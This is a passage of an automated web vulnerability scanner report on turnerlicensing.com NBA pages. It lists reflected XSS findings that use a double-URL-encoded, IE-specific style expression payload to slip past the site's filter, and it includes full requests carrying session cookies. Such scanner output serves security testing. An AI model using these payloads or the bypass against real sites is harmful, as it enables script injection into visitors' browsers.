Set-Cookie: JSESSIONID=RFL9MyYdj4nYZVyJQZYQnZKtFcm03MTxdwGLqQq1JN8jhGc0yvtwr262V8YVCnpRlpGTmQ9RRs1Ldvrn5KhKnm9XHFP1nS1GVlMf9pp5CYY4BTtXrb5Mq8x7J21py91k!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:52:23 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=869
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 71671


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Los Angeles Lakers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
ng.com/s.nl?sc=69&category=144124&it=A&id=8440&66095%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252700567ee7d15=1&66095%27style%3d%27x%3aexpression%28alert%281%29%29%2700567ee7d15=1&66095'style='x:expression(alert(1))'00567ee7d15=1&fromsla=T'>
...[SNIP]...

1.32. http://www.turnerlicensing.com/NBA/los_angeles_lakers/8050476 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/los_angeles_lakers/8050476

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 94806'style='x:expression(alert(1))'13a71e1e314 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/los_angeles_lakers/8050476?94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:52:24 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:52:24 GMT
NS_RTIMER_COMPOSITE: 542522492:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=JKZhMyYLh824rzgbv2f3pVwshysHGsdyJ3x54q1v8NTpvddrrZCmbxVNrHBj0Ts4MyQynTpMR8hVVL9mJ42Ql0xb1h1QC7PST7W2vLyTN8vcsZYj6rZn2N6TFtpbVQTN!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:52:33 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=971
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 70937


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Los Angeles Lakers</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...'
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144124&it=A&id=8645&94806%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%252713a71e1e314=1&94806'style='x:expression(alert(1))'13a71e1e314=1&94806%27style%3d%27x%3aexpression%28alert%281%29%29%2713a71e1e314=1&fromsla=T'>
...[SNIP]...

1.33. http://www.turnerlicensing.com/NBA/memphis_grizzlies [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/memphis_grizzlies

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9ff10'style='x:expression(alert(1))'bcb4a180582 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/memphis_grizzlies?9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:44 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:49 GMT
NS_RTIMER_COMPOSITE: -1158397501:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=Lp5HMyTYptnbPvpmq76lmL1V9LkhL276dRKRHs1zBdjJJP4b4zyZSTbj0Gdb2zspNBxhTq1v7qFD3mjJBsL3PSZZ1LcyvvydqTQ1rpDv1fd2pL1D7wKvvVLYCS1XtShR!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:30:56 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=888
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 78522


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Memphis Grizzlies</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144125&9ff10%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527bcb4a180582=1&9ff10%27style%3d%27x%3aexpression%28alert%281%29%29%27bcb4a180582=1&9ff10'style='x:expression(alert(1))'bcb4a180582=1&fromsla=T'>
...[SNIP]...

1.34. http://www.turnerlicensing.com/NBA/miami_heat [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/miami_heat

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8c96e'style='x:expression(alert(1))'db91eadeb70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/miami_heat?8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:08 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:10 GMT
NS_RTIMER_COMPOSITE: -2142663813:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=4hd2MyTNfQ5gNfCVfPTgfD8Nx131dQSfJv4xj3S3tzlhDDq1klQ1tkdzG09QglYMQjgyllFrNnn2vHhmhgyDwVyKxpYkSRt4d3nZwyQjCVzRz9LjThjddTz0Rn5TPXpw!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:19 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 100190


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Miami Heat</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</script>
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144126&8c96e%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527db91eadeb70=1&fromsla=T&8c96e'style='x:expression(alert(1))'db91eadeb70=1&8c96e%27style%3d%27x%3aexpression%28alert%281%29%29%27db91eadeb70=1'>
...[SNIP]...

1.35. http://www.turnerlicensing.com/NBA/miami_heat/8010795 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/miami_heat/8010795

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a51ee'style='x:expression(alert(1))'3e962f6b57e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/miami_heat/8010795?a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:52:05 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:52:06 GMT
NS_RTIMER_COMPOSITE: -348525875:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=wvvGMyYVNNLkHLQWhqK5MJhp7jQmwVwnp8NSHGy4WJK1jG6dJLWTGz2s7wpV1JymQCBY5tPr1pjvhNR96JQRxQkcSnlrJrw1mlpfvnpLTF2Kv717LMXJ7nXGphtQSx1j!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:52:15 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=982
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 44514


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Miami Heat</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</scrip
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144126&it=A&id=8442&a51ee%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25273e962f6b57e=1&a51ee'style='x:expression(alert(1))'3e962f6b57e=1&a51ee%27style%3d%27x%3aexpression%28alert%281%29%29%273e962f6b57e=1&fromsla=T'>
...[SNIP]...

1.36. http://www.turnerlicensing.com/NBA/milwaukee_bucks [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/milwaukee_bucks

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d2b8b'style='x:expression(alert(1))'046c82d959d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/milwaukee_bucks?d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:56 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:00 GMT
NS_RTIMER_COMPOSITE: -1152502227:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=y6SnMyTDkRLYz1p9yKcFcsWQ4cy0hx9NGyzzWxNDBHypqyJDCnM06R2N7mypKQjpVKNMmcZfMLlTpys8Nv2yZJvzyvjBn9JphGy77C4GQ1RKzcZkQ2JFj9QBRgz2h6G2!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:08 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=963
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 78480


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Milwaukee Bucks</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144127&d2b8b%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527046c82d959d=1&d2b8b'style='x:expression(alert(1))'046c82d959d=1&d2b8b%27style%3d%27x%3aexpression%28alert%281%29%29%27046c82d959d=1&fromsla=T'>
...[SNIP]...

1.37. http://www.turnerlicensing.com/NBA/minnesota_timberwolves [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/minnesota_timberwolves

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f5210'style='x:expression(alert(1))'b54a972631c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/minnesota_timberwolves?f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:30:50 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:30:55 GMT
NS_RTIMER_COMPOSITE: 2002367337:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=LzgmMyTdPd98LlfdJNF5b05VTQ0NW9121fNWpPwmR5KBhB92KhP47QcTytXQSxK2B9DQjNg2kRMT8SRkLL1x40d1hnhQl2Qv6JnNLrFk0xJ2w1lX92BstdJqhbpKShxG!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:00 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=928
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 62176


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Minnesota Timberwolves</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading..
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144130&f5210%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527b54a972631c=1&f5210%27style%3d%27x%3aexpression%28alert%281%29%29%27b54a972631c=1&f5210'style='x:expression(alert(1))'b54a972631c=1&fromsla=T'>
...[SNIP]...

1.38. http://www.turnerlicensing.com/NBA/new_jersey_nets [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/new_jersey_nets

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b3679'style='x:expression(alert(1))'9e9f63a36eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/new_jersey_nets?b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:31:10 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:31:12 GMT
NS_RTIMER_COMPOSITE: -108874937:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=ZZMlMyTQpbR7LdLrPTg9WcYxy0hc0SF4KlbN1gd02grqgyFT2cwJvPD4x3PZJQy64CkQZ0gDQvsgLy9RM6SYL5FZn2D9zjKdndkqKjjjLgGk0xXvnnqQfhNm19bJrgS6!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:31:22 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=881
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 94902


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Jersey Nets</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</sc
...[SNIP]...
turnerlicensing.com/s.nl?sc=69&category=144138&b3679%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25279e9f63a36eb=1&b3679%27style%3d%27x%3aexpression%28alert%281%29%29%279e9f63a36eb=1&b3679'style='x:expression(alert(1))'9e9f63a36eb=1&fromsla=T'>
...[SNIP]...

1.39. http://www.turnerlicensing.com/NBA/new_jersey_nets/8080309 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/new_jersey_nets/8080309

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 389d0'style='x:expression(alert(1))'622558a5928 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /NBA/new_jersey_nets/8080309?389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928=1 HTTP/1.1
Host: www.turnerlicensing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NLVisitorId=rnoX2kNXAZKv7gpK; JSESSIONID=BN31MyMZn0Q1slsnpLHnThdkxP6y1N1JNFlS0hfpWkVsp1130MW9Nw9XgbYyLGL53vhMQbkNkWLvWqQpnsLM08zMhW1sTxxnTbfGJxyb3pytvSynJwcn27dTRjv6McpG!-1715434465; NLShopperId3=rnoX2q9XAatYKaJC; __utmz=1.1289244024.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); NS_VER=2010.2.0; __utma=1.2027734133.1289244024.1290274971.1290275978.10; __utmc=1; __utmb=1.3.10.1290275978;

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 18:52:07 GMT
Server: Apache
Expires: 0
Last-Modified: Sat, 20 Nov 2010 18:52:08 GMT
NS_RTIMER_COMPOSITE: 1487474912:73686F702D6A6176613033362E7376616C652E6E65746C65646765722E636F6D:80
Set-Cookie: JSESSIONID=yxL2MyYXYd5lYsgcFmZCqLDX12yQKncSypTbSSQfGnvCQ3hQqTJ9Dd8JqPrl4LBZfMypVswJtTZr1nPJZLHH9nXfhLKQ1N1n8y63YwdL4RCpchRtlgpQ1chh4Jtvp94n!-1715434465; path=/
Set-Cookie: NLShopperId3=rnoX2q9XAatYKaJC; domain=.turnerlicensing.com; expires=Saturday, 27-Nov-2010 18:52:18 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
P3P: CP="CAO PSAa OUR BUS PUR"
Vary: User-Agent
Keep-Alive: timeout=10, max=868
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 71422


<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>New Jersey Nets</title>


<script language='JavaScript' type='text/javascript'>window.status='Loading...';</
...[SNIP]...
<input type='hidden' name='referer' value='http://www.turnerlicensing.com/s.nl?sc=69&category=144138&it=A&id=3994&389d0%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%2527622558a5928=1&389d0'style='x:expression(alert(1))'622558a5928=1&389d0%27style%3d%27x%3aexpression%28alert%281%29%29%27622558a5928=1&fromsla=T'>
...[SNIP]...

1.40. http://www.turnerlicensing.com/NBA/new_orleans_hornets [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.turnerlicensing.com
Path:   /NBA/new_orleans_hornets

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9d44a%2527style%253d%2527x%253aexpression%2528alert%25281%2529%2529%25272283fff6c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9d44a'style='x:expression(alert(1))'2283fff6c79 in the application's response.

